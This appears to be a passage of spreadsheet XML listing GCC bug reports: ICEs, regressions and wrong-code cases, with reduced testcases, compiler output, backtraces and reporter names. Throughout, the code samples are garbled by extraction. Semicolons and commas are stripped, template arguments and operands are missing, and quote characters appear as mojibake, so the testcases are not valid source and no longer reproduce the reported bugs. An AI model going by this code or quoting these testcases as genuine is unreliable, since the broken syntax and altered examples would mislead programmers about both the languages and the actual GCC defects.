depends on a variable e.g.  int n = 5 int a[n][n] address calculation for
accessing the array elements is wrong. Example code:
--- snip ---
int result
class A {
        public:
        A()
}
void remember(int i) {
        result = i
}
void test() {
        int n = 5
        int a[n][n]
        a[0][4] = 42
        a[4][0] = 43
        remember(a[0][4])  // a[0][4] still is 42
}
A::A() {
        int n = 5
        int a[n][n]
        a[0][4] = 42
        a[4][0] = 43  // overwrites a[0][4]!
        remember(a[0][4])  // a[0][4] is 43
}
int main(int argc char** argv) {
        A* object = new A()
        return result
}
--- snip ---
In the above code the constructor will set result to 43. The identical code of
test() will set result to 42.
The assembler code of test() and the constructor differs slightly: in test() n
is stored in %ecx moved to %eax for some computation and is later moved to
%eax a second time. In the constructor however n is moved to %eax directly and
later where test() would movl %ecx %eax the constructor does movl 0 %eax
instead.
$gcc --version
gcc (GCC) 3.3.5 (Debian 1:3.3.5-5)</t>
  </si>
  <si>
    <t>lathander</t>
  </si>
  <si>
    <t>GCC-24059</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE expand_expr_real_1 with -ftree-vectorize -O2</t>
  </si>
  <si>
    <t>I was trying -O2 -g -ftree-vectorize while bootstrapping and ran into this.
Reduced testcase:
struct pred_data {
  unsigned char codes[((int) 100)]
}
void compute_predicate_codes (char *codes struct pred_data *p)
{
  int i
  for (i = 0i &lt; ((int) 100)i++)
    codes[i] = p-&gt;codes[i] ? 2 : 0
}
----------
This does not happen with -m32.</t>
  </si>
  <si>
    <t>GCC-39098</t>
  </si>
  <si>
    <t>FAIL: libgomp.fortran/reduction3.f90</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objdir/gcc/ /home/dave/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/reduction3.f90  -B/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/ -I/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp -I/home/dave/gnu/gcc/gcc/libgomp/testsuite/.. -fmessage-length=0 -fopenmp  -O1   -B/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/../libgfortran/.libs   -L/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/.libs -lgomp -L/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/../libgfortran/.libs -lgfortranbegin -lgfortran -lm   -o ./reduction3.exe    (timeout = 300)
PASS: libgomp.fortran/reduction3.f90  -O1  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/.libs:/home/dave/gnu/gcc/objdir/gcc:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/../libgfortran/.libs:.:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/.libs:/home/dave/gnu/gcc/objdir/gcc:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/./libgomp/../libgfortran/.libs:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/libstdc++-v3/.libs:/home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/libgomp/.libs:/home/dave/gnu/gcc/objdir/./gcc:/home/dave/gnu/gcc/objdir/./prev-gcc:/home/dave/opt/gnu/gcc/gcc-4.3.3/lib:/home/dave/opt/gnu/lib
FAIL: libgomp.fortran/reduction3.f90  -O1  execution test
Starting program: /home/dave/gnu/gcc/objdir/arm-none-linux-gnueabi/libgomp/testsuite/reduction3.xg
[Thread debugging using libthread_db enabled]
[New Thread 0x4030b000 (LWP 24657)]
[New Thread 0x40b0b450 (LWP 24658)]
[New Thread 0x4130b450 (LWP 24659)]
[Switching to Thread 0x4030b000 (LWP 24657)]
Breakpoint 2 _gfortran_abort ()
    at ../../../gcc/libgfortran/intrinsics/abort.c:39
39        abort ()
(gdb) bt
#0  _gfortran_abort () at ../../../gcc/libgfortran/intrinsics/abort.c:39
#1  0x00008924 in MAIN__ ()
    at /home/dave/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/reduction3.f90:52
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
Target: arm-none-linux-gnueabi
Configured with: ../gcc/configure --host=arm-none-linux-gnueabi --target=arm-none-linux-gnueabi --build=arm-none-linux-gnueabi --enable-languages=cc++fortran --enable-shared --enable-threads --disable-multilib --disable-libmudflap --disable-libssp --enable-symvers=gnu --enable-__cxa_atexit --disable-libstdcxx-pch --enable-checking=release --prefix=/home/dave/opt/gnu/gcc/gcc-4.4.0 --with-gmp=/home/dave/opt/gnu
Thread model: posix
gcc version 4.4.0 20090202 (experimental) [trunk revision 143869] (GCC)
(gdb) p r
$1 = 3
(gdb) p ra
$2 = (6.5 6.5 4 4)</t>
  </si>
  <si>
    <t>GCC-65600</t>
  </si>
  <si>
    <t>[5 Regression] bost testsuite failure: ICE: Segmentation fault</t>
  </si>
  <si>
    <t>Running the boost testsuite on ppc64le shows:
trippels@gcc2-power8 tools % cat weak_ptr_move_test.ii
class A {
public:
  virtual void m_fn1() {}
  int weak_release___trans_tmp_1
  void m_fn2() {
    __asm__(0\n\tlwarx   %2\n\taddi   1\n\tstwcx.   %2\n\tbne 0b\n\tisync)
    if (weak_release___trans_tmp_1)
      m_fn1()
  }
}
class weak_count {
  A *pi_
public:
  weak_count() : pi_() {}
  ~weak_count() {
    if (pi_)
      pi_-&gt;m_fn2()
  }
}
class B {
  weak_count pn
}
int
main() { B a }
trippels@gcc2-power8 tools % g++ -O2 -std=c++11 weak_ptr_move_test.ii
weak_ptr_move_test.ii:25:15: internal compiler error: Segmentation fault
 main() { B a }
               ^
0x10a1f773 crash_signal
        ../../gcc/gcc/toplev.c:383
0x1053958c symtab_node::semantically_equivalent_p(symtab_node*)
        ../../gcc/gcc/symtab.c:1631
0x10547177 cgraph_edge::resolve_speculation(tree_node*)
        ../../gcc/gcc/cgraph.c:1169
0x107e7653 redirect_to_unreachable
        ../../gcc/gcc/ipa-inline-analysis.c:771
0x107e7653 edge_set_predicate
        ../../gcc/gcc/ipa-inline-analysis.c:797
0x107ec4b3 remap_edge_summaries
        ../../gcc/gcc/ipa-inline-analysis.c:3506
0x107eefef inline_merge_summary(cgraph_edge*)
        ../../gcc/gcc/ipa-inline-analysis.c:3653
0x11079ed7 inline_call(cgraph_edge* bool vec* int* bool bool*)
        ../../gcc/gcc/ipa-inline-transform.c:357
0x1107085b inline_small_functions
        ../../gcc/gcc/ipa-inline.c:1949
0x1107085b ipa_inline
        ../../gcc/gcc/ipa-inline.c:2352
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-53223</t>
  </si>
  <si>
    <t>[c++0x] auto&amp;&amp; and operator* don't mix inside templates</t>
  </si>
  <si>
    <t>This is truly bizarre:
struct A
{
  int good() const
  int operator *() const
}
template
void func(T t)
{
  A x
  auto        // OK
  auto   // OK
  auto           // error here
}
void func2(int)
{
  A x
  auto               // OK
}
int main()
{
  func(0)
  func2(0)
}
gcc 4.6 and 4.7 can't compile the line marked error here.  The error looks like:
auto-rvalue.cc: In instantiation of â€˜void func(T) [with T = int]â€™:
auto-rvalue.cc:24:9:   required from here
auto-rvalue.cc:13:19: error: invalid initialization of non-const reference of type â€˜int&amp;â€™ from an rvalue of type â€˜intâ€™
I suppose this could be correct but I'd be very surprised.  clang++ 2.9 accepts this code.</t>
  </si>
  <si>
    <t>GCC-25483</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE on valid code with -O2 -fmove-loop-invariants</t>
  </si>
  <si>
    <t>Attached testcase when compiled by gcc version 4.2.0 20051217 (experimental) on x86 using:
-----------------
gcc -O2 -fmove-loop-invariants -c -o mpegaudiodec.o mpegaudiodec.c
-----------------
results in the following
-----------------
mpegaudiodec.c: In function â€˜decode_initâ€™:
mpegaudiodec.c:510: error: unrecognizable insn:
(insn:HI 1144 718 1309 70 (set (reg:SI 507)
        (fix:SI (reg:DF 506))) -1 (insn_list:REG_DEP_TRUE 718 (nil))
    (expr_list:REG_DEAD (reg:DF 506)
        (nil)))
mpegaudiodec.c:510: internal compiler error: in extract_insn at recog.c:2084
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-----------------
Works on x86_64.</t>
  </si>
  <si>
    <t>zadeck</t>
  </si>
  <si>
    <t>GCC-46645</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: 20_util/unique_ptr/requirements/explicit_instantiation/explicit_instantiation.cc</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 167121 gave
FAIL: 20_util/unique_ptr/requirements/explicit_instantiation/explicit_instantiation.cc (test for excess errors)
Revision 167110 is OK. It may be caused by revision 167118:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg01007.html</t>
  </si>
  <si>
    <t>GCC-36846</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] ICE with variadic templates partial specialization</t>
  </si>
  <si>
    <t>This code ICEs. This isn't preprocessed but is trivial and the preprocessor lines highlight a change that switches the ICE on and off so I've left it in to help.
*****************************************
template
struct pair
template
struct pairs
template
struct pairs...&gt; {
#ifndef NO_ICE
  struct mismatched_packs {}
#endif
}
template class pairs&lt;
  pair
  pair
&gt;
*****************************************
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-languages=c++
Thread model: posix
gcc version 4.4.0 20080712 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O3' '-c' '-std=c++0x' '-shared-libgcc' '-mtune=generic'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.4.0/cc1plus -E -quiet -v -D_GNU_SOURCE fail.cc -mtune=generic -std=c++0x -O3 -fpch-preprocess -o fail.ii
ignoring nonexistent directory /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/../../../../include/c++/4.4.0
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/../../../../include/c++/4.4.0/x86_64-unknown-linux-gnu
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/../../../../include/c++/4.4.0/backward
 /usr/local/include
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/include
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O3' '-c' '-std=c++0x' '-shared-libgcc' '-mtune=generic'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.4.0/cc1plus -fpreprocessed fail.ii -quiet -dumpbase fail.cc -mtune=generic -auxbase fail -O3 -std=c++0x -version -o fail.s
GNU C++ (GCC) version 4.4.0 20080712 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.0 20080712 (experimental) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: f6a0a74a0d4d0fcd1077c2c18ac6908a
fail.cc: In instantiation of â€˜pairs pair &gt;â€™:
fail.cc:14:   instantiated from here
fail.cc:10: error: mismatched argument pack lengths while expanding â€˜pairâ€™
fail.cc: In instantiation of â€˜pairs pair &gt;::mismatched_packsâ€™:
fail.cc:14:   instantiated from here
fail.cc:10: internal compiler error: tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in instantiate_class_template at cp/pt.c:6945
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>tristan.wibberley</t>
  </si>
  <si>
    <t>GCC-48954</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGSEGV in bitmap_count_bits (bitmap.c:719) with -O2 -flto -fno-early-inlining -fkeep-inline-functions</t>
  </si>
  <si>
    <t>Created attachment 24220
reduced testcase
Compiler output (run under valgrind):
$ g++ -O2 -flto -fno-early-inlining -fkeep-inline-functions testcase.C
==3584== 
==3584== Invalid read of size 8
==3584==    at 0x507DE6: bitmap_count_bits (bitmap.c:719)
==3584==    by 0x7491C2: output_cgraph (lto-cgraph.c:1591)
==3584==    by 0x759C91: lto_output (lto-streamer-out.c:2222)
==3584==    by 0x7940E2: ipa_write_optimization_summaries_1 (passes.c:1760)
==3584==    by 0x794C2F: ipa_write_optimization_summaries (passes.c:1806)
==3584==    by 0x4F59DA: lto_main (lto.c:1996)
==3584==    by 0x880F69: toplev_main (toplev.c:570)
==3584==    by 0x644AB6C: (below main) (in /lib64/libc-2.11.3.so)
==3584==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==3584== 
lto1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r173586 - crash
4.6 r173059 - OK (yesrtldf checking)</t>
  </si>
  <si>
    <t>GCC-3791</t>
  </si>
  <si>
    <t>Internal compiler error in grokdeclarator at cp/decl.c:9760</t>
  </si>
  <si>
    <t xml:space="preserve">    g++  -c -ftemplate-depth-50   -g -O0 -fno-inline   -Iy:\test -I. -I..\boost_prerelease -I..\boost_root   -o y:\test\bin\etest\gcc\debug\runtime-link-dynamic\etest.obj  etest.cpp 
etest.cpp:222: Internal error #19990331.
etest.cpp:222: Internal compiler error in grokdeclarator at cp/decl.c:9760
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Please see attached preprocessed source
Release:
gcc-3.0
Environment:
cygwin/Win200</t>
  </si>
  <si>
    <t>david.abrahams</t>
  </si>
  <si>
    <t>GCC-5524</t>
  </si>
  <si>
    <t>gcc-2.95.3 crashes when using -mno-ieee-fp</t>
  </si>
  <si>
    <t>Compiling libvorbis-1.0rc3 gcc crashes with sig11 on envelope.c:
-----
$ gcc -v -save-temps -DPACKAGE=\libvorbis\ -DVERSION=\1.0rc3\ -DHAVE_DLFCN_H=1 -DHAVE_ALLOCA_H=1 -DHAVE_ALLOCA=1 -DHAVE_SQRTF=1 -DHAVE_LOGF=1 -DHAVE_EXPF=1 -DHAVE_ACOSF=1 -DHAVE_ATANF=1 -DHAVE_FREXPF=1 -DHAVE_RINTF=1 -I. -I. -I../include -O20 -ffast-math -mno-ieee-fp -D_REENTRANT -fsigned-char -march=i686 -Wall -DUSE_MEMORY_H -c envelope.c  -fPIC -DPIC -o .libs/envelope.lo
Reading specs from /usr/lib/gcc-lib/i386-conectiva-linux/2.95.3/specs
gcc version 2.95.3 20010315 (release)
GNU CPP version 2.95.3 20010315 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 ../include
 /usr/include
 /usr/local/include
 /usr/lib/gcc-lib/i386-conectiva-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-conectiva-linux/2.95.3/../../../../include/g++-3
 /usr/lib/gcc-lib/i386-conectiva-linux/2.95.3/../../../../i386-conectiva-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-conectiva-linux/2.95.3/cc1 envelope.i -quiet -dumpbase envelope.c -mno-ieee-fp -march=i686 -O20 -Wall -version -ffast-math -fsigned-char -fPIC -o envelope.s
GNU C version 2.95.3 20010315 (release) (i386-conectiva-linux) compiled by GNU C version 2.95.3 20010315 (release).
gcc: Internal compiler error: program cc1 got fatal signal 11
-----
Note: I have read the sig11 faq and I believe this is not a hardware problem. It crashes on the same source file consistenly even after reboot and when run on physically different harddisks.
-----
Other notes: I am sorry for repeating this bug report. The gnatsweb.pl script did not respond on the first 3 tries but later I got mail indicating that it had got my input. Meanwhile however I studied other bug reporting instructions quite confusing I must say and generated a .i file which is attache din this (fourth) report. Please ignore the others.
It would be helpful if you merge these two pages:
http://www.gnu.org/software/gcc/gnats.html
http://www.gnu.org/software/gcc/bugs.html
- since they both contain different sintructions about what should go into a bug report.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
OS: Conectiva Linux 7.0: linux-2.4.17 glibc-2.2.3.
PC: 2*Celeron 333 384 MB RAM.
Envvars (from list in 'info gcc'):
TMPDIR=/home/simonl/tmp
CPLUS_INCLUDE_PATH=/usr/lib/qt2/include
LANG=en_US
CFLAGS=-march=i686 -Wall
gcc: I have not built it myself it is from the distribution. I can do it if necessary.
How-To-Repeat:
The attached envelope.i is created 
Run the above gcc command. Or start from scratch:
- Download http://www.oddsock.org/vorbisrc3/files/rc3/unix/libvorbis-1.0rc.tar.gz
- Unpack
$ ./configure --enable-static=yes --enable-shared=yes
$ make
Crashes on envelope.c as desribed above.</t>
  </si>
  <si>
    <t>sal</t>
  </si>
  <si>
    <t>GCC-58679</t>
  </si>
  <si>
    <t>[4.9 regression] ICE in create_pre_exit at mode-switching.c:421 with -mavx after r202915</t>
  </si>
  <si>
    <t>Happens with gcc.c-torture/execute/pr30185.c with just -O2 -mavx options.
Removing all REG_DEAD and REG_UNUSED notes as said in r202915 affected work of single_set_2 for 
  if (GET_CODE (pat) == PARALLEL)
and hence in mode-switching.c single_set now returns NULL for
  return_copy_pat = single_set (return_copy)
Not sure who is exactly wrong here - create_pre_exit code doesn't look very clear :(</t>
  </si>
  <si>
    <t>GCC-61330</t>
  </si>
  <si>
    <t>[5 Regression] Thumb ICE for case 920507-1.c</t>
  </si>
  <si>
    <t>I'm running regression test for the latest GCC trunk for cortex-m0 I run into below ICE but after I remove the commit at trunk@210901 the test case will pass.
How to reproduce:
Executing on host: /work/terguo01/trunk-t1/build-native/gcc-final/gcc/xgcc -B/work/terguo01/trunk-t1/build-native/gcc-final/gcc/ /work/terguo01/trunk-t1/src/gcc/gcc/testsuite/gcc.dg/noncompile/920507-1.c  -fno-diagnostics-show-caret -fdiagnostics-color=never   -O1  -ffat-lto-objects -S    -mthumb -mcpu=cortex-m0 -o 920507-1.s    (timeout = 300)
spawn /work/terguo01/trunk-t1/build-native/gcc-final/gcc/xgcc -B/work/terguo01/trunk-t1/build-native/gcc-final/gcc/ /work/terguo01/trunk-t1/src/gcc/gcc/testsuite/gcc.dg/noncompile/920507-1.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O1 -ffat-lto-objects -S -mthumb -mcpu=cortex-m0 -o 920507-1.s^M
/work/terguo01/trunk-t1/src/gcc/gcc/testsuite/gcc.dg/noncompile/920507-1.c: In function 'x':^M
/work/terguo01/trunk-t1/src/gcc/gcc/testsuite/gcc.dg/noncompile/920507-1.c:5:16: error: invalid register name for 'a'^M
/work/terguo01/trunk-t1/src/gcc/gcc/testsuite/gcc.dg/noncompile/920507-1.c:3:1: internal compiler error: in symtab_get_node at cgraph.h:1021^M
0xc1920c symtab_get_node^M
        /work/terguo01/trunk-t1/src/gcc/gcc/cgraph.h:1018^M
0xc1920c symtab_get_node^M
        /work/terguo01/trunk-t1/src/gcc/gcc/varasm.c:1134^M
0xc1920c decl_comdat_group^M
        /work/terguo01/trunk-t1/src/gcc/gcc/cgraph.h:1629^M
0xc1920c get_block_for_decl^M
        /work/terguo01/trunk-t1/src/gcc/gcc/varasm.c:1146^M
0xc1cadf make_decl_rtl(tree_node*)^M
        /work/terguo01/trunk-t1/src/gcc/gcc/varasm.c:1376^M
0x8d6b4f rest_of_decl_compilation(tree_node* int int)^M
        /work/terguo01/trunk-t1/src/gcc/gcc/passes.c:215^M
0x6206a3 expand_one_hard_reg_var^M
        /work/terguo01/trunk-t1/src/gcc/gcc/cfgexpand.c:1108^M
0x6206a3 expand_one_var^M
        /work/terguo01/trunk-t1/src/gcc/gcc/cfgexpand.c:1295^M
0x620e0b expand_used_vars_for_block^M
        /work/terguo01/trunk-t1/src/gcc/gcc/cfgexpand.c:1338^M
0x62c1e6 expand_used_vars^M</t>
  </si>
  <si>
    <t>wangzheyu1989</t>
  </si>
  <si>
    <t>GCC-57770</t>
  </si>
  <si>
    <t>non-static data member initializer in nested class and default value in constructor cause compiler segmentation fault</t>
  </si>
  <si>
    <t>When compiling this:
struct A
{
    struct B
    {
        int i = 0
    }
    B b
    A(const B&amp; _b = B())
        : b(_b)
    {}
}
with this command:
g++ -std=c++11 -c test.cpp
this happens:
test_cpp.cpp: In constructor 'constexpr A::B::B()':
test_cpp.cpp:36:12: internal compiler error: Segmentation fault
with this system:
gcc -v output:
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib64/gcc/x86_64-suse-linux/4.7/lto-wrapper
Target: x86_64-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++javaada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.7 --enable-ssp --disable-libssp --disable-libitm --disable-plugin --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --enable-linker-build-id --program-suffix=-4.7 --enable-linux-futex --without-system-libunwind --with-arch-32=i586 --with-tune=generic --build=x86_64-suse-linux
Thread model: posix
gcc version 4.7.2 20130108 [gcc-4_7-branch revision 195012] (SUSE Linux)
uname -a output:
Linux etam-laptop.lan 3.7.10-1.16-desktop #1 SMP PREEMPT Fri May 31 20:21:23 UTC 2013 (97c14ba) x86_64 x86_64 x86_64 GNU/Linux
Above specification is default openSUSE 12.3. I could reproduce this bug also on openSUSE 12.2 and Fedora 18.
Additional notes:
struct A
{
    struct B
    {
        int i
        constexpr B() : i(0) {}
    }
    B b
    A(const B&amp; _b = B())
        : b(_b)
    {}
}
and
struct A
{
    struct B
    {
        int i = 0
    }
    B b
    A(const B&amp; _b)
        : b(_b)
    {}
}
compiles fine.</t>
  </si>
  <si>
    <t>GCC-19239</t>
  </si>
  <si>
    <t>[4.0 only] gfortran ICE on vector subscript expressions</t>
  </si>
  <si>
    <t>Hi
this valid program:
program dummy
  integerdimension(2) :: index=(/11/) 
  realdimension(2) :: A=1.0
  print*A(index+1)
end program dummy
gives:
dummy.f90: In function â€˜MAIN__â€™:
dummy.f90:6: fatal error: gfc_todo: Not Implemented: vector subscript expressions
compilation terminated.
with gcc version 4.0.0 20050102</t>
  </si>
  <si>
    <t>panuzzo</t>
  </si>
  <si>
    <t>GCC-44713</t>
  </si>
  <si>
    <t>[4.6 regression] Revision 161530 failed bootstrap</t>
  </si>
  <si>
    <t>On Linux/x86 revison 161530:
http://gcc.gnu.org/ml/gcc-cvs/2010-06/msg01448.html
caused:
../../src-trunk/gcc/config/i386/i386.c: At top level:
../../src-trunk/gcc/config/i386/i386.c:30995:8: error: initialization from incompatible pointer type [-Werror]
../../src-trunk/gcc/config/i386/i386.c:30995:8: error: (near initialization for 'targetm.calls.function_arg_advance') [-Werror]
../../src-trunk/gcc/config/i386/i386.c:30995:8: error: initialization from incompatible pointer type [-Werror]
../../src-trunk/gcc/config/i386/i386.c:30995:8: error: (near initialization for 'targetm.calls.function_arg') [-Werror]
../../src-trunk/gcc/config/i386/i386.c:30995:8: error: initialization from incompatible pointer type [-Werror]</t>
  </si>
  <si>
    <t>GCC-12349</t>
  </si>
  <si>
    <t>gcc accepts specialization of template in typedef</t>
  </si>
  <si>
    <t>Very minor problem: this is accepted though I think it shouldn't really: 
----------------------------------- 
template  struct X 
template  typedef struct X {} T 
----------------------------------- 
At least some other compilers barf at it. The fact that it is accepted 
is absolutely irrelevant since one can't do anything with the so-declared 
type T -- if I try to use it in 
----------------------------------- 
template  struct X 
template  typedef struct X {} T 
T t 
----------------------------------- 
I get from present mainline this: 
tmp/build-gcc&gt; ../build-gcc/gcc-install/bin/c++ -c x.cc 
x.cc:3: error: `T' does not name a type 
W.</t>
  </si>
  <si>
    <t>GCC-2452</t>
  </si>
  <si>
    <t>Test case for PR fortran/2379 - undefined reference to `__builtin</t>
  </si>
  <si>
    <t xml:space="preserve"> This is a test case for PR fortran/2379.  With g77 version 3.0 20010327
 (prerelease) on i686-pc-cygwin this gives
 20010402-1.o(.text+0x41):20010402-1.f: undefined reference to
 `__builtin_cos'
 20010402-1.o(.text+0x89):20010402-1.f: undefined reference to
 `__builtin_sin'
 collect2: ld returned 1 exit status
 2001-04-02  David Billinghurst 
 	* g77.f-torture/execute/20010402-1.f:  New test
 --- /dev/null   Mon Apr  2 11:07:16 2001
 +++ g77.f-torture/execute/20010402-1.f  Mon Apr  2 11:44:56 2001
 @@ -00 +18 @@
 +C     Test case for PR fortran/2379
 +      real pi sin cos sinx cosx
 +      pi = 3.14159265359
 +      cosx = cos(pi/4)
 +      if ( abs(cosx-sqrt(0.5)) .gt. 1.0e-5 ) call abort
 +      sinx = sin(pi/6)
 +      if ( abs(sinx-0.5) .gt. 1.0e-5 ) call abort
 +      end
Release:
unknown
Unformatted:
 	_sin'</t>
  </si>
  <si>
    <t>GCC-32721</t>
  </si>
  <si>
    <t>[4.3 Regression] CCP removes volatile qualifiers.</t>
  </si>
  <si>
    <t>With today's trunk on a private port . consider the following testcase. 
volatile int spinlock[2]
void main (void)
{
volatile int * spinlock0
volatile int * spinlock1
spinlock0 = 
spinlock1 = 
*spinlock0 = 0
*spinlock1 = 0
 while (*spinlock0)
}
CCP folds this into the following form 
Simulating block 4
Simulating block 3
Substituing values and folding statements
Folded statement: *spinlock0_1 = 0
            into: spinlock[0] = 0
Folded statement: *spinlock1_2 = 0
            into: spinlock[1] = 0
Folded statement: D.1498_3 = *spinlock0_1
            into: D.1498_3 = spinlock[0]
main ()
{
  volatile int * spinlock1
  volatile int * spinlock0
  int D.1498
:
  spinlock0_1 = 
  spinlock1_2 = 
  spinlock[0] = 0
  spinlock[1] = 0
:
  D.1498_3 = spinlock[0] ---&gt; This folding seems to be wrong. 
  if (D.1498_3 != 0)
    goto 
  else
    goto 
:
  return
}</t>
  </si>
  <si>
    <t>GCC-80492</t>
  </si>
  <si>
    <t>[5 Regression] Wrong code when unrolling a loop with inline asm and local regs</t>
  </si>
  <si>
    <t>Created attachment 41248
loopasm.c: GNU-C99 test case</t>
  </si>
  <si>
    <t>GCC-23364</t>
  </si>
  <si>
    <t>[4.0 only] missing format reversion for internal write</t>
  </si>
  <si>
    <t>ifort gets this rigt.
$ cat internal-reversion.f90
  character(len=20) dimension(2) ::  line(2)
  integer dimension(2) :: a
  a = 2
  write (unit=linefmt='(aI4)') a
  print *line(1)
  print *line(2)
end
$ gfortran internal-reversion.f90
$ ./a.out
 a   2 a   2
$ ifort internal-reversion.f90
$ ./a.out
 a   2
 a   2
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1/configure --prefix=/home/ig25 --enable-languages=cf95
Thread model: posix
gcc version 4.1.0 20050811 (experimental)</t>
  </si>
  <si>
    <t>GCC-57412</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in verify_loop_structure at cfgloop.c:1647: loop 1's latch does not have an edge to its header with -fopenmp -fipa-pure-const</t>
  </si>
  <si>
    <t>Created attachment 30190
reduced testcase
Compiler output:
$ gcc -fopenmp -fipa-pure-const testcase.C 
testcase.C: In function '':
testcase.C:8:1: error: loop 1's latch does not have an edge to its header
 }
 ^
testcase.C:8:1: internal compiler error: in verify_loop_structure at cfgloop.c:1647
0x8513ae verify_loop_structure()
        /mnt/svn/gcc-trunk/gcc/cfgloop.c:1647
0xa7e928 loop_optimizer_init(unsigned int)
        /mnt/svn/gcc-trunk/gcc/loop-init.c:110
0x12fb799 analyze_function
        /mnt/svn/gcc-trunk/gcc/ipa-pure-const.c:786
0x12fbe69 generate_summary
        /mnt/svn/gcc-trunk/gcc/ipa-pure-const.c:929
0xaf70de execute_ipa_summary_passes(ipa_opt_pass_d*)
        /mnt/svn/gcc-trunk/gcc/passes.c:2136
0x872db0 ipa_passes
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1903
0x872db0 compile()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1999
0x872fe9 finalize_compilation_unit()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2127
0x685040 cp_write_global_declarations()
        /mnt/svn/gcc-trunk/gcc/cp/decl2.c:4327
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                          
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-199312-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf
--enable-languages=cc++ltofortran
--prefix=/mnt/svn/gcc-trunk/binary-199312-lto-fortran-checking-yes-rtl-df/
--without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130524 (experimental) (GCC) 
Tested revisions:
r199312 - fail
4.8 r198018 - OK</t>
  </si>
  <si>
    <t>GCC-4480</t>
  </si>
  <si>
    <t>after aboute 40 minutes installing gcc 3.0.1 chrashed suddenly.</t>
  </si>
  <si>
    <t>There was an old version of gcc stable version 2.95.3. I need to install SWIG (from www.swig.org) and I couldn't because the installation file said there isn't a c++ compiler and I would install a newer version of gcc version 3.0.1 but it did not worked. See the file attached.
Release:
gcc version 2.95.3 19991030 (prerelease)
Environment:
i386-conectiva-linux
How-To-Repeat:
I used the command line: 
./configure
and 
make bootstrap
after.</t>
  </si>
  <si>
    <t>igorleal</t>
  </si>
  <si>
    <t>GCC-4708</t>
  </si>
  <si>
    <t>[parser] Internal compiler error in lookup_template_class at cp/pt.c:3961</t>
  </si>
